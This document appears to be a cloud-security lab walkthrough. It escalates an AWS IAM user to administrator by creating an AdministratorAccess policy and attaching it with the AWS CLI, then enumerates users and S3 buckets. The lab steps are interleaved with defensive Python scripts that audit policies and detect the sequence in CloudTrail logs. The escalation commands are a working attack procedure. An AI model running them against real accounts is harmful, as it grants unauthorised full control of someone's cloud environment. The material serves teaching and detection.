4. Perform Privilege Escalation to Gain Higher Privileges
In the cloud platform, owing to mistakes in the access allocation system such as coding errors and design flaws, a customer, a third party, or an employee can obtain higher access rights than those th
1. Escalate IAM privileges by exploiting a misconfigured user policy
A policy is an entity that, when attached to an identity or resource, defines its permissions. You can use the AWS Management Console, AWS CLI, or AWS API to create customer-managed policies in IAM. Customer-managed policies are standalone policies that you administer in your AWS account. You can then attach the policies to the identities (users, groups, and roles) in your AWS account. If the user policies are not configured properly, they can be exploited by attackers to gain full administrator access to the target user’s AWS account.
Before starting this task, create an IAM user (Test) with default settings and create a policy (Test) with permissions including iam:AttachUserPolicy, iam:ListUserPolicies, sts:AssumeRole, and iam:ListRoles, as shown in the screenshot below. A user holding these permissions can grant itself administrator-level privileges, which is exactly the misconfiguration this task exploits.
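The misconfiguration above can be caught before an attacker does by auditing policy documents for actions that let a principal widen its own permissions. The following Python script is an added example written for this page; it is not part of the lab or of any AWS tooling. It flags Allow statements granting iam:AttachUserPolicy or sts:AssumeRole (the two permissions from the Test policy that enable the escalation), resolves IAM wildcard patterns such as iam:* with the same case-insensitive glob matching IAM uses, and rates a finding HIGH when the Resource is unrestricted ("*"). The sample policies, including the reproduction of the Test policy, are constructed for the example.

```python
import fnmatch
import json

# Actions from the lab's Test policy that let a principal widen its own
# permissions. iam:AttachUserPolicy on an unrestricted Resource is what
# enables the escalation in this task; sts:AssumeRole on "*" lets the user
# assume any role whose trust policy permits it.
SELF_ESCALATION_ACTIONS = {
    "iam:AttachUserPolicy": "attach any managed policy (e.g. AdministratorAccess) to a user",
    "sts:AssumeRole": "assume any role whose trust policy permits it",
}


def _as_list(value):
    """IAM accepts a single string or a list for Statement/Action/Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def action_matches(pattern, action):
    """IAM action names are case-insensitive; patterns may use * and ?."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def audit_policy(document):
    """Return findings for Allow statements granting escalation-capable actions.

    Conditions are not evaluated: a Condition may narrow the grant, but the
    action is still reported so a reviewer can confirm the restriction.
    """
    findings = []
    for index, stmt in enumerate(_as_list(document.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        resources = _as_list(stmt.get("Resource"))
        unrestricted = "*" in resources
        for pattern in _as_list(stmt.get("Action")):
            for action, impact in SELF_ESCALATION_ACTIONS.items():
                if action_matches(pattern, action):
                    findings.append({
                        "statement": index,
                        "pattern": pattern,
                        "action": action,
                        "resource": resources,
                        "severity": "HIGH" if unrestricted else "MEDIUM",
                        "impact": impact,
                    })
    return findings


# Constructed reproduction of the lab's Test policy (the page shows it only as a screenshot).
LAB_TEST_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["iam:AttachUserPolicy", "iam:ListUserPolicies",
               "sts:AssumeRole", "iam:ListRoles"],
    "Resource": "*"
  }]
}""")

# Constructed: the same risk hidden behind a service-level wildcard.
WILDCARD_POLICY = {"Version": "2012-10-17",
                   "Statement": {"Effect": "Allow", "Action": "iam:*", "Resource": "*"}}

# Constructed: list-only permissions, which should produce no findings.
READ_ONLY_POLICY = {"Version": "2012-10-17",
                    "Statement": [{"Effect": "Allow",
                                   "Action": ["iam:ListUserPolicies", "iam:ListRoles"],
                                   "Resource": "*"}]}

if __name__ == "__main__":
    for name, doc in [("Test", LAB_TEST_POLICY), ("wildcard", WILDCARD_POLICY),
                      ("read-only", READ_ONLY_POLICY)]:
        for f in audit_policy(doc):
            print(f"{name}: statement {f['statement']} [{f['severity']}] "
                  f"{f['pattern']} -> {f['action']}: {f['impact']}")
```

Run against exported customer-managed policy documents (for example the output of aws iam get-policy-version) as part of a periodic review; a HIGH finding on a policy attached to a non-administrative user is the condition this task relies on.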
In the terminal window, type vim user-policy.json and press Enter.
This command creates a file named user-policy.json in the current directory on the attacker machine.
A command-line text editor appears; press i to enter insert mode and type the script given below:
This is an AdministratorAccess policy that gives administrator access to the target IAM user. After entering the script given in the previous step, press the Esc button. Then, type :wq! and press Enter to save the text document.
Now, we will create the managed policy (user-policy) from the file so that it can be attached to the target IAM user's account. To do so, type
aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json
The created user policy is displayed, showing details such as PolicyName, PolicyId, and Arn.
In the terminal, type
aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy
The above command will attach the policy (user-policy) to the target IAM user account (here, test).
Now, type
aws iam list-attached-user-policies --user-name [Target Username]
It will show all policies attached to that user.
The result appears, displaying the attached policy name (user-policy), as shown in the screenshot.
Now that you have successfully escalated the privileges of the target IAM user account, you can list all the IAM users in the AWS environment. To do so, type aws iam list-users and press Enter.
Similarly, you can use various commands to obtain complete information about the AWS environment such as the list of S3 buckets, user policies, role policies, and group policies, as well as to create a new user.
List of S3 buckets: aws s3api list-buckets --query "Buckets[].Name"
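From the defender's side, every step of this task is recorded by CloudTrail: CreatePolicy, AttachUserPolicy, ListAttachedUserPolicies, ListUsers and ListBuckets all produce management events. The following Python script is an added detection example written for this page, not part of the lab or of AWS's tooling. It scans CloudTrail records and raises an alert when a principal attaches a policy to its own user, when AdministratorAccess is attached to any user, or when a principal creates a customer-managed policy and attaches it within a short window, which is the exact sequence of the create-policy and attach-user-policy commands above. The records are constructed to resemble CloudTrail output (the field layout userIdentity.userName, requestParameters.policyArn and responseElements.policy.arn is assumed from CloudTrail's IAM event format) and use the AWS documentation example account ID 111122223333.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# AWS managed policy that grants full administrator access.
ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"
# CreatePolicy and AttachUserPolicy by the same principal closer than this are correlated.
CORRELATION_WINDOW = timedelta(minutes=10)


def _event_time(record):
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _actor(record):
    identity = record.get("userIdentity", {})
    return identity.get("userName") or identity.get("arn", "unknown")


def detect_policy_self_escalation(records):
    """Return alerts for AttachUserPolicy events matching the pattern in this task."""
    alerts = []
    created = defaultdict(dict)  # actor -> policy ARN -> time the actor created it
    for rec in sorted(records, key=_event_time):
        if rec.get("eventSource") != "iam.amazonaws.com":
            continue
        actor, when = _actor(rec), _event_time(rec)
        if rec.get("eventName") == "CreatePolicy":
            policy = (rec.get("responseElements") or {}).get("policy") or {}
            if policy.get("arn"):
                created[actor][policy["arn"]] = when
        elif rec.get("eventName") == "AttachUserPolicy":
            params = rec.get("requestParameters") or {}
            target, arn = params.get("userName"), params.get("policyArn", "")
            reasons = []
            if target == actor:
                reasons.append("principal attached a policy to its own user")
            if arn == ADMIN_POLICY_ARN:
                reasons.append("AdministratorAccess attached")
            created_at = created[actor].get(arn)
            if created_at is not None and when - created_at <= CORRELATION_WINDOW:
                reasons.append("same principal created this policy %ds earlier"
                               % int((when - created_at).total_seconds()))
            if reasons:
                alerts.append({"time": rec["eventTime"], "actor": actor, "target": target,
                               "policyArn": arn, "reasons": reasons})
    return alerts


def _event(name, actor, time, **extra):
    """Build a minimal constructed CloudTrail record."""
    rec = {"eventSource": "iam.amazonaws.com", "eventName": name, "eventTime": time,
           "userIdentity": {"type": "IAMUser", "userName": actor}}
    rec.update(extra)
    return rec


# Constructed sample trail: the lab sequence by user Test, one benign attach, one admin grant.
SAMPLE_EVENTS = [
    _event("CreatePolicy", "Test", "2024-01-15T10:00:00Z",
           requestParameters={"policyName": "user-policy"},
           responseElements={"policy": {"policyName": "user-policy",
                                        "arn": "arn:aws:iam::111122223333:policy/user-policy"}}),
    _event("AttachUserPolicy", "Test", "2024-01-15T10:00:40Z",
           requestParameters={"userName": "Test",
                              "policyArn": "arn:aws:iam::111122223333:policy/user-policy"}),
    _event("AttachUserPolicy", "admin-user", "2024-01-15T11:00:00Z",
           requestParameters={"userName": "dev-user",
                              "policyArn": "arn:aws:iam::aws:policy/ReadOnlyAccess"}),
    _event("AttachUserPolicy", "admin-user", "2024-01-15T11:05:00Z",
           requestParameters={"userName": "new-hire", "policyArn": ADMIN_POLICY_ARN}),
]

if __name__ == "__main__":
    for alert in detect_policy_self_escalation(SAMPLE_EVENTS):
        print(alert["time"], alert["actor"], "->", alert["target"], alert["policyArn"])
        for reason in alert["reasons"]:
            print("   ", reason)
```

The self-attach rule is the most specific signal for this task because legitimate administration almost never involves a user attaching a policy to itself; the AdministratorAccess rule is noisier but worth reviewing, since the lab shows that a customer-managed policy with the same Allow-all content is just as dangerous, which is why the create-then-attach correlation is included.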